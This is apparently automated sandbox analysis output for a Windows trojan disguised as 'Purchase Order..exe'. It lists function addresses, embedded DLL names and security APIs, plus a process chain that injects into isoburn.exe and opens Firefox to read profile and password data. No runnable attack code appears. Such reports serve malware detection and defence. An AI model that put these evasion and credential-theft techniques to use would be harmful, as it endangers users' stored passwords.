                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018707703_2_01870770
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188C6E03_2_0188C6E0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018729A03_2_018729A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0193A9A63_2_0193A9A6
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018869623_2_01886962
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018568B83_2_018568B8
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E8F03_2_0189E8F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018728403_2_01872840
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187A8403_2_0187A840
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01926BD73_2_01926BD7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192AB403_2_0192AB40
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA803_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01888DBF3_2_01888DBF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186ADE03_2_0186ADE0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187AD003_2_0187AD00
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190CD1F3_2_0190CD1F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910CB53_2_01910CB5
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01860CF23_2_01860CF2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870C003_2_01870C00
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EEFA03_2_018EEFA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01862FC83_2_01862FC8
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187CFE03_2_0187CFE0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01912F303_2_01912F30
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B2F283_2_018B2F28
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01890F303_2_01890F30
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E4F403_2_018E4F40
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192CE933_2_0192CE93
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01882E903_2_01882E90
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192EEDB3_2_0192EEDB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192EE263_2_0192EE26
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870E593_2_01870E59
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187B1B03_2_0187B1B0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A516C3_2_018A516C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185F1723_2_0185F172
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0193B16B3_2_0193B16B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018770C03_2_018770C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191F0CC3_2_0191F0CC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192F0E03_2_0192F0E0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019270E93_2_019270E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B739A3_2_018B739A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192132D3_2_0192132D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185D34C3_2_0185D34C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018752A03_2_018752A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188B2C03_2_0188B2C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019112ED3_2_019112ED
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190D5B03_2_0190D5B0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019275713_2_01927571
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192F43F3_2_0192F43F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018614603_2_01861460
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192F7B03_2_0192F7B0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019216CC3_2_019216CC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B56303_2_018B5630
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019059103_2_01905910
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018799503_2_01879950
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188B9503_2_0188B950
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018738E03_2_018738E0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DD8003_2_018DD800
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188FB803_2_0188FB80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018ADBF93_2_018ADBF9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E5BF03_2_018E5BF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192FB763_2_0192FB76
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B5AA03_2_018B5AA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01911AA33_2_01911AA3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190DAAC3_2_0190DAAC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191DAC63_2_0191DAC6
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01927A463_2_01927A46
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192FA493_2_0192FA49
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E3A6C3_2_018E3A6C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188FDC03_2_0188FDC0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01873D403_2_01873D40
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01921D5A3_2_01921D5A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01927D733_2_01927D73
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192FCF23_2_0192FCF2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E9C323_2_018E9C32
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01871F923_2_01871F92
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192FFB13_2_0192FFB1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01833FD23_2_01833FD2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01833FD53_2_01833FD5
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192FF093_2_0192FF09
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01879EB03_2_01879EB0
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A603E75_2_03A603E7
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A603F25_2_03A603F2
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A602A25_2_03A602A2
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A622B25_2_03A622B2
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A68A725_2_03A68A72
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6208A5_2_03A6208A
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A620925_2_03A62092
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6A8625_2_03A6A862
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A80F825_2_03A80F82
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0496E4F66_2_0496E4F6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049644206_2_04964420
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049724466_2_04972446
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049805916_2_04980591
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C05356_2_048C0535
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DC6E06_2_048DC6E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048BC7C06_2_048BC7C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048E47506_2_048E4750
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C07706_2_048C0770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049520006_2_04952000
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049801AA6_2_049801AA
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049741A26_2_049741A2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049781CC6_2_049781CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048B01006_2_048B0100
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0495A1186_2_0495A118
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049481586_2_04948158
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049402C06_2_049402C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049602746_2_04960274
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CE3F06_2_048CE3F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049803E66_2_049803E6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497A3526_2_0497A352
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04960CB56_2_04960CB5
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048B0CF26_2_048B0CF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C0C006_2_048C0C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048D8DBF6_2_048D8DBF
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048BADE06_2_048BADE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0495CD1F6_2_0495CD1F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CAD006_2_048CAD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497CE936_2_0497CE93
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048D2E906_2_048D2E90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497EEDB6_2_0497EEDB
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497EE266_2_0497EE26
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C0E596_2_048C0E59
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0493EFA06_2_0493EFA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048B2FC86_2_048B2FC8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CCFE06_2_048CCFE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04962F306_2_04962F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04902F286_2_04902F28
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048E0F306_2_048E0F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04934F406_2_04934F40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048A68B86_2_048A68B8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048EE8F06_2_048EE8F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CA8406_2_048CA840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C28406_2_048C2840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C29A06_2_048C29A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0498A9A66_2_0498A9A6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048D69626_2_048D6962
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048BEA806_2_048BEA80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04976BD76_2_04976BD7
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497AB406_2_0497AB40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497F43F6_2_0497F43F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048B14606_2_048B1460
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0495D5B06_2_0495D5B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049775716_2_04977571
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049716CC6_2_049716CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497F7B06_2_0497F7B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C70C06_2_048C70C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0496F0CC6_2_0496F0CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497F0E06_2_0497F0E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049770E96_2_049770E9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CB1B06_2_048CB1B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F516C6_2_048F516C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0498B16B6_2_0498B16B
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048AF1726_2_048AF172
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C52A06_2_048C52A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DB2C06_2_048DB2C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049612ED6_2_049612ED
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0490739A6_2_0490739A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497132D6_2_0497132D
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048AD34C6_2_048AD34C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FCF26_2_0497FCF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04939C326_2_04939C32
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DFDC06_2_048DFDC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C3D406_2_048C3D40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04971D5A6_2_04971D5A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04977D736_2_04977D73
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C9EB06_2_048C9EB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C1F926_2_048C1F92
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FFB16_2_0497FFB1
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04883FD26_2_04883FD2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04883FD56_2_04883FD5
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FF096_2_0497FF09
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C38E06_2_048C38E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0492D8006_2_0492D800
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049559106_2_04955910
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C99506_2_048C9950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DB9506_2_048DB950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04905AA06_2_04905AA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04961AA36_2_04961AA3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0495DAAC6_2_0495DAAC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0496DAC66_2_0496DAC6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04977A466_2_04977A46
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FA496_2_0497FA49
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04933A6C6_2_04933A6C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DFB806_2_048DFB80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04935BF06_2_04935BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048FDBF96_2_048FDBF9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FB766_2_0497FB76
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_00701C306_2_00701C30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FCAE86_2_006FCAE8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FCAF06_2_006FCAF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FAD006_2_006FAD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FCD106_2_006FCD10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FAE456_2_006FAE45
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FAE506_2_006FAE50
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_007052C06_2_007052C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_007034D06_2_007034D0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0071B9E06_2_0071B9E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469E7706_2_0469E770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469E2B46_2_0469E2B4
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469E3D36_2_0469E3D3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469D8386_2_0469D838
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04907E54 appears 102 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048F5130 appears 58 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0492EA12 appears 86 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0493F290 appears 105 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048AB970 appears 280 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018A5130 appears 58 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018EF290 appears 105 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018DEA12 appears 86 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018B7E54 appears 102 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 0185B970 appears 280 times
                Source: Purchase Order..exe, 00000000.00000002.1439121005.000000000115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1454658069.0000000007520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1440993765.0000000004059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1440435766.0000000003090000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1453763523.00000000059B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order..exe
                Source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs Purchase Order..exe
                Source: Purchase Order..exe, 00000003.00000002.1835504450.000000000195D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order..exe
                Source: Purchase Order..exeBinary or memory string: OriginalFilenamehsSy.exe0 vs Purchase Order..exe
                Source: Purchase Order..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, bjs6Td2uGivbYQmp4T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, bjs6Td2uGivbYQmp4T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@7/5
                Source: C:\Users\user\Desktop\Purchase Order..exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order..exe.logJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeMutant created: NULL
                Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\l420377xJump to behavior
                Source: Purchase Order..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Purchase Order..exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: isoburn.exe, 00000006.00000003.2020985352.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2020836634.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Purchase Order..exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order..exe "C:\Users\user\Desktop\Purchase Order..exe"
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess created: C:\Users\user\Desktop\Purchase Order..exe "C:\Users\user\Desktop\Purchase Order..exe"
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess created: C:\Users\user\Desktop\Purchase Order..exe "C:\Users\user\Desktop\Purchase Order..exe"Jump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
